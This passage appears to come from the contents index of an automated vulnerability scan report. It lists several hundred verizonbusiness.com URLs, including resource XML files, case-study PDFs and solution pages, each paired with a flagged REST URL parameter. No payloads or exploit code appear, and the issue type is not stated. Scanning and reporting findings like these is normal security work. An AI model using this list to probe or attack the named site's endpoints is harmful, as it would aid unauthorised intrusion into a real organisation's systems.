1.626. http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml [REST URL parameter 1]

1.627. http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml [REST URL parameter 2]

1.628. http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml [REST URL parameter 2]

1.629. http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml [REST URL parameter 1]

1.630. http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml [REST URL parameter 1]

1.631. http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml [REST URL parameter 2]

1.632. http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml [REST URL parameter 2]

1.633. http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml [REST URL parameter 1]

1.634. http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml [REST URL parameter 1]

1.635. http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml [REST URL parameter 2]

1.636. http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml [REST URL parameter 2]

1.637. http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml [REST URL parameter 1]

1.638. http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml [REST URL parameter 1]

1.639. http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml [REST URL parameter 2]

1.640. http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml [REST URL parameter 2]

1.641. http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml [REST URL parameter 1]

1.642. http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml [REST URL parameter 1]

1.643. http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml [REST URL parameter 2]

1.644. http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml [REST URL parameter 2]

1.645. http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml [REST URL parameter 1]

1.646. http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml [REST URL parameter 1]

1.647. http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml [REST URL parameter 2]

1.648. http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml [REST URL parameter 2]

1.649. http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml [REST URL parameter 1]

1.650. http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml [REST URL parameter 1]

1.651. http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml [REST URL parameter 2]

1.652. http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml [REST URL parameter 2]

1.653. http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml [REST URL parameter 1]

1.654. http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml [REST URL parameter 1]

1.655. http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml [REST URL parameter 2]

1.656. http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml [REST URL parameter 2]

1.657. http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml [REST URL parameter 1]

1.658. http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml [REST URL parameter 1]

1.659. http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml [REST URL parameter 2]

1.660. http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml [REST URL parameter 2]

1.661. http://www.verizonbusiness.com/resources/1002a2a29-111-Carrier+&+Wholesale.xml [REST URL parameter 1]

1.662. http://www.verizonbusiness.com/resources/1002a2a29-111-Carrier+&+Wholesale.xml [REST URL parameter 1]

1.663. http://www.verizonbusiness.com/resources/1002a2a29-111-Carrier+&+Wholesale.xml [REST URL parameter 2]

1.664. http://www.verizonbusiness.com/resources/1002a2a29-111-Carrier+&+Wholesale.xml [REST URL parameter 2]

1.665. http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml [REST URL parameter 1]

1.666. http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml [REST URL parameter 1]

1.667. http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml [REST URL parameter 2]

1.668. http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml [REST URL parameter 2]

1.669. http://www.verizonbusiness.com/resources/1002a2a30-111-Global+Network.xml [REST URL parameter 1]

1.670. http://www.verizonbusiness.com/resources/1002a2a30-111-Global+Network.xml [REST URL parameter 1]

1.671. http://www.verizonbusiness.com/resources/1002a2a30-111-Global+Network.xml [REST URL parameter 2]

1.672. http://www.verizonbusiness.com/resources/1002a2a30-111-Global+Network.xml [REST URL parameter 2]

1.673. http://www.verizonbusiness.com/resources/1002a2a31-111-Customer+Enablement.xml [REST URL parameter 1]

1.674. http://www.verizonbusiness.com/resources/1002a2a31-111-Customer+Enablement.xml [REST URL parameter 1]

1.675. http://www.verizonbusiness.com/resources/1002a2a31-111-Customer+Enablement.xml [REST URL parameter 2]

1.676. http://www.verizonbusiness.com/resources/1002a2a31-111-Customer+Enablement.xml [REST URL parameter 2]

1.677. http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml [REST URL parameter 1]

1.678. http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml [REST URL parameter 1]

1.679. http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml [REST URL parameter 2]

1.680. http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml [REST URL parameter 2]

1.681. http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml [REST URL parameter 1]

1.682. http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml [REST URL parameter 1]

1.683. http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml [REST URL parameter 2]

1.684. http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml [REST URL parameter 2]

1.685. http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml [REST URL parameter 1]

1.686. http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml [REST URL parameter 1]

1.687. http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml [REST URL parameter 2]

1.688. http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml [REST URL parameter 2]

1.689. http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml [REST URL parameter 1]

1.690. http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml [REST URL parameter 1]

1.691. http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml [REST URL parameter 2]

1.692. http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml [REST URL parameter 2]

1.693. http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml [REST URL parameter 1]

1.694. http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml [REST URL parameter 1]

1.695. http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml [REST URL parameter 2]

1.696. http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml [REST URL parameter 2]

1.697. http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml [REST URL parameter 1]

1.698. http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml [REST URL parameter 1]

1.699. http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml [REST URL parameter 2]

1.700. http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml [REST URL parameter 2]

1.701. http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml [REST URL parameter 1]

1.702. http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml [REST URL parameter 1]

1.703. http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml [REST URL parameter 2]

1.704. http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml [REST URL parameter 2]

1.705. http://www.verizonbusiness.com/resources/1002a3a11-111-Blogs.xml [REST URL parameter 1]

1.706. http://www.verizonbusiness.com/resources/1002a3a11-111-Blogs.xml [REST URL parameter 1]

1.707. http://www.verizonbusiness.com/resources/1002a3a11-111-Blogs.xml [REST URL parameter 2]

1.708. http://www.verizonbusiness.com/resources/1002a3a11-111-Blogs.xml [REST URL parameter 2]

1.709. http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml [REST URL parameter 1]

1.710. http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml [REST URL parameter 1]

1.711. http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml [REST URL parameter 2]

1.712. http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml [REST URL parameter 2]

1.713. http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml [REST URL parameter 1]

1.714. http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml [REST URL parameter 1]

1.715. http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml [REST URL parameter 2]

1.716. http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml [REST URL parameter 2]

1.717. http://www.verizonbusiness.com/resources/1002a3a14-111-Solutions+Briefs.xml [REST URL parameter 1]

1.718. http://www.verizonbusiness.com/resources/1002a3a14-111-Solutions+Briefs.xml [REST URL parameter 1]

1.719. http://www.verizonbusiness.com/resources/1002a3a14-111-Solutions+Briefs.xml [REST URL parameter 2]

1.720. http://www.verizonbusiness.com/resources/1002a3a14-111-Solutions+Briefs.xml [REST URL parameter 2]

1.721. http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml [REST URL parameter 1]

1.722. http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml [REST URL parameter 1]

1.723. http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml [REST URL parameter 2]

1.724. http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml [REST URL parameter 2]

1.725. http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml [REST URL parameter 1]

1.726. http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml [REST URL parameter 1]

1.727. http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml [REST URL parameter 2]

1.728. http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml [REST URL parameter 2]

1.729. http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml [REST URL parameter 1]

1.730. http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml [REST URL parameter 1]

1.731. http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml [REST URL parameter 2]

1.732. http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml [REST URL parameter 2]

1.733. http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml [REST URL parameter 1]

1.734. http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml [REST URL parameter 1]

1.735. http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml [REST URL parameter 2]

1.736. http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml [REST URL parameter 2]

1.737. http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml [REST URL parameter 1]

1.738. http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml [REST URL parameter 1]

1.739. http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml [REST URL parameter 2]

1.740. http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml [REST URL parameter 2]

1.741. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos [REST URL parameter 1]

1.742. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos [REST URL parameter 1]

1.743. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos [REST URL parameter 2]

1.744. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos [REST URL parameter 2]

1.745. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml [REST URL parameter 1]

1.746. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml [REST URL parameter 1]

1.747. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml [REST URL parameter 2]

1.748. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml [REST URL parameter 2]

1.749. http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml [REST URL parameter 1]

1.750. http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml [REST URL parameter 1]

1.751. http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml [REST URL parameter 2]

1.752. http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml [REST URL parameter 2]

1.753. http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml [REST URL parameter 1]

1.754. http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml [REST URL parameter 1]

1.755. http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml [REST URL parameter 2]

1.756. http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml [REST URL parameter 2]

1.757. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 1]

1.758. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 1]

1.759. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 2]

1.760. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 2]

1.761. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 3]

1.762. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 3]

1.763. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 1]

1.764. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 1]

1.765. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 2]

1.766. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 2]

1.767. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 3]

1.768. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 3]

1.769. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 1]

1.770. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 1]

1.771. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 2]

1.772. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 2]

1.773. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 3]

1.774. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 3]

1.775. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 1]

1.776. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 1]

1.777. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 2]

1.778. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 2]

1.779. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 3]

1.780. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 3]

1.781. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 1]

1.782. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 1]

1.783. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 2]

1.784. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 2]

1.785. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 3]

1.786. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 1]

1.787. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 1]

1.788. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 2]

1.789. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 2]

1.790. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 3]

1.791. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 3]

1.792. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 1]

1.793. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 1]

1.794. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 2]

1.795. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 2]

1.796. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 3]

1.797. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 1]

1.798. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 1]

1.799. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 2]

1.800. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 2]

1.801. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 3]

1.802. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 1]

1.803. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 1]

1.804. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 2]

1.805. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 2]

1.806. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 3]

1.807. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 1]

1.808. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 1]

1.809. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 2]

1.810. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 2]

1.811. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 3]

1.812. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 3]

1.813. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 1]

1.814. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 1]

1.815. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 2]

1.816. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 2]

1.817. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 3]

1.818. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 3]

1.819. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 1]

1.820. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 1]

1.821. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 2]

1.822. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 2]

1.823. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 3]

1.824. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 3]

1.825. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 1]

1.826. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 1]

1.827. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 2]

1.828. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 2]

1.829. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 3]

1.830. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 3]

1.831. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 1]

1.832. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 1]

1.833. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 2]

1.834. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 2]

1.835. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 3]

1.836. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 3]

1.837. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 4]

1.838. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 4]

1.839. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 1]

1.840. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 1]

1.841. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 2]

1.842. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 2]

1.843. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 3]

1.844. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 3]

1.845. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 1]

1.846. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 1]

1.847. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 2]

1.848. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 2]

1.849. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 3]

1.850. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 3]

1.851. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 1]

1.852. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 1]

1.853. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 2]

1.854. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 2]

1.855. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 3]

1.856. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 3]

1.857. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 1]

1.858. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 1]

1.859. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 2]

1.860. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 2]

1.861. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 3]

1.862. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 3]

1.863. http://www.verizonbusiness.com/se/ [REST URL parameter 1]

1.864. http://www.verizonbusiness.com/se/ [REST URL parameter 1]

1.865. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 1]

1.866. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 1]

1.867. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 2]

1.868. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 2]

1.869. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 3]

1.870. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 3]

1.871. http://www.verizonbusiness.com/sg/ [REST URL parameter 1]

1.872. http://www.verizonbusiness.com/sg/ [REST URL parameter 1]

1.873. http://www.verizonbusiness.com/sitemap/ [REST URL parameter 1]

1.874. http://www.verizonbusiness.com/sitemap/ [REST URL parameter 1]

1.875. http://www.verizonbusiness.com/solutions/ [REST URL parameter 1]

1.876. http://www.verizonbusiness.com/solutions/ [REST URL parameter 1]

1.877. http://www.verizonbusiness.com/solutions/byindustry/ [REST URL parameter 1]

1.878. http://www.verizonbusiness.com/solutions/byindustry/ [REST URL parameter 1]

1.879. http://www.verizonbusiness.com/solutions/byindustry/ [REST URL parameter 2]

1.880. http://www.verizonbusiness.com/solutions/byindustry/ [REST URL parameter 2]

1.881. http://www.verizonbusiness.com/solutions/byneed/ [REST URL parameter 1]

1.882. http://www.verizonbusiness.com/solutions/byneed/ [REST URL parameter 1]

1.883. http://www.verizonbusiness.com/solutions/byneed/ [REST URL parameter 2]

1.884. http://www.verizonbusiness.com/solutions/byneed/ [REST URL parameter 2]

1.885. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 1]

1.886. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 1]

1.887. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 2]

1.888. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 2]

1.889. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 3]

1.890. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 3]

1.891. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 1]

1.892. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 1]

1.893. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 2]

1.894. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 2]

1.895. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 3]

1.896. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 3]

1.897. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 1]

1.898. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 1]

1.899. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 2]

1.900. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 2]

1.901. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 3]

1.902. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 3]

1.903. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 1]

1.904. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 1]

